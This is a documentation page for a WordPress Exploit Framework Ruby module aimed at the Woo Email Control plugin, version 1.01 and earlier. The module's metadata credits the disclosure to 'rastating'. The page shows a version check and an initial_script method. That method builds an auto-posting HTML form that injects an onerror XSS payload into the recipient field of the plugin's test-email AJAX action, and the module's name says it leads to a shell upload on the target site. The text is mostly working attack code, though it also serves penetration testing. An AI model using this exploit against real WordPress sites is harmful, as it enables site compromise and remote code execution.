class Wpxf::Exploit::WooEmailControlReflectedXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::StagedReflectedXss::new
# File lib/wpxf/modules/exploit/xss/reflected/woo_email_control_reflected_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'Woo Email Control <= 1.01 Reflected XSS Shell Upload', author: [ 'rastating' # Disclosure + WPXF module ], references: [ ['WPVDB', '8559'], ['URL', 'http://blog.rastating.com/woo-email-control-1-01-reflected-xss-disclosure'] ], date: 'Jul 18 2016' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/woo_email_control_reflected_xss_shell_upload.rb, line 22 def check check_plugin_version_from_changelog('woo-email-control', 'readme.txt', '1.02') end
initial_script()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/woo_email_control_reflected_xss_shell_upload.rb, line 30 def initial_script %|<html><head></head><body><script> #{js_post} post('#{vulnerable_url}', { action: 'wooctrl_send_test_email', email_class: 'WC_Email_Customer_New_Account', recipient: '#{Utility::Text.rand_email}<img src=x onerror=#{xss_ascii_encoded_include_script}>' }); </script></body></html> | end
vulnerable_url()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/woo_email_control_reflected_xss_shell_upload.rb, line 26 def vulnerable_url wordpress_url_admin_ajax end